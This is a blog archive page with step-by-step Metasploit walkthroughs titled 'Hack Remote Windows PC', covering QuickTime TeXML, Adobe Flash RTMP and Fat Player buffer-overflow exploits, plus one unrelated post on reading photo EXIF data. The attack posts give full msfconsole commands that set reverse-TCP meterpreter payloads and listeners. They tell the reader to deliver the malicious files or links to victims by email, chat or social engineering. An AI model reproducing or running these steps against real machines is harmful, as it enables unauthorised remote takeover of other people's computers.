Raj Chandel's Blog
Archive for June, 2012
Hack Remote Windows PC using Apple QuickTime TeXML Stack Buffer Overflow
011 months ago
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. The flaw is generally known as a bug while processing the ‘transform’ attribute, however, that attack vector seems to only cause a Terminate Process call due to a corrupt stack cookie, and more data will only trigger a warning about the malformed XML file. This module exploits the ‘color’ value instead, which accomplishes the same thing.
Exploit Targets
QuickTime 7.7.1 on Windows XP SP3
QuickTime 7.7.0 on Windows XP SP3
QuickTime 7.6.9 on Windows XP SP3
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/apple_quicktime_texml
Msf exploit (apple_quicktime_texml)>set payload windows/meterpreter/reverse_tcp
Msf exploit (apple_quicktime_texml)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (apple_quicktime_texml)>set srvhost 192.168.1.3
Msf exploit (apple_quicktime_texml)>show targets
Msf exploit (apple_quicktime_texml)>set target 0
Msf exploit (apple_quicktime_texml)>exploit
After we successfully generate the malicious File, it will stored on your local computer
/root/.msf4/local/msf.xml
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your msf.xml files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
Hack Remote Windows PC using Adobe Flash Player Object Type Confusion
011 months ago
This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.
Exploit Targets
Adobe Flash Player 11.2.202.235
Internet Explorer 7 on XP SP2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/adobe_flash_rtmp
Msf exploit (adobe_flash_rtmp)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_flash_rtmp)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (adobe_flash_rtmp)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (adobe_flash_rtmp)>set uripath / (The Url to use for this exploit)
Msf exploit (adobe_flash_rtmp)>exploit
Now an URL you should give to your victim http://192.168.1.2:8080/
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
How to view Date & Time of any Captured JPEG Image
012 months ago
ExifDataView
ExifDataView is a small utility that reads and displays the Exif data stored inside .jpg image files generated by digital cameras. The EXIF data includes the name of the company created the camera, camera model, the date/time that the photograph was taken, Exposure Time, ISO Speed, GPS information (for digital cameras with GPS), and more.
Download
Photo Studio
Photo Studio is a useful tool for exploring the Meta data stored along with your image files. The program supports a wide variety of Meta data standards, including EXIF, CIFF, Olympus, JFIF and Photoshop. EXIF data will be of particular interest to digital camera users – it is the format used by most digital cameras to store camera settings along with an image.
Download
In Windows PC
Right Click on Your Image then click on properties
In properties tab click on Details
Hack Windows PC in LAN using Fat Player Media Player 0.6b0 Buffer Overflow
012 months ago
This module exploits a buffer overflow in Fat Player 0.6b. When the application is used to import a specially crafted wav file, a buffer overflow occurs allowing arbitrary code execution.
Exploit Targets
Fat Player 0.6b
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/fatplayer_wav
Msf exploit (fatplayer_wav)>set payload windows/meterpreter/reverse_tcp
Msf exploit (fatplayer_wav)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (fatplayer_wav)>set srvhost 192.168.1.4
Msf exploit (fatplayer_wav)>exploit
After we successfully generate the malicious WAV File, it will stored on your local computer
/root/.msf4/local/msf.wav
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.4
exploit
Now send your msf.wav files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
